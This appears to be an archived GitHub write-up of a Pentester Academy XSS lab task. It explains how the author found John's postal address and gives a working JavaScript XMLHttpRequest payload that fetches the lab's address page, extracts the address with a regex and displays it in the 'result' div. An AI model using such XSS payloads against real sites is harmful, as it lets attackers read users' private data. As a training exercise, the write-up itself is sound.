Skip to content
This repository was archived by the owner on Jun 2, 2022. It is now read-only.

Latest commit

 

History

History
35 lines (23 loc) · 1.98 KB

TASK_18.md

File metadata and controls

35 lines (23 loc) · 1.98 KB

Task 18 [Try Now]

Objectives:

  1. Find John's Postal Address using an XSS vulnerability on this page
  2. Display the Postal address in the div with id "result"
  3. No Hardcoded values can be used - everything has to be figured out dynamically

After looking the source code of the page, I found that we can find the address on the below URL

![]https://i.ibb.co/wKZKvQG/image.png]

When I opened the URL, I found the same page with <p> tag containing the address

So basically, in this we can do this by parsing the HTML using DOMParser or simply we can use the RegExp pattern for it

In this we need the text between <p id="address">...</p>. After googling, I found this "Selecting Text Between HTML Tags"

REGEX USED: /<p id="address">(.+?)<\/p>/

const xhttp = new XMLHttpRequest();

xhttp.onreadystatechange = function () {
  if (this.readyState == 4 && this.status == 200) {
    document.querySelector("#result").innerText = /<p id="address">(.+?)<\/p>/.exec(xhttp.responseText)[1];
  }
};
xhttp.open("GET", "http://pentesteracademylab.appspot.com/lab/webapp/jfp/18/address", true);
xhttp.send();

For POC, Click Here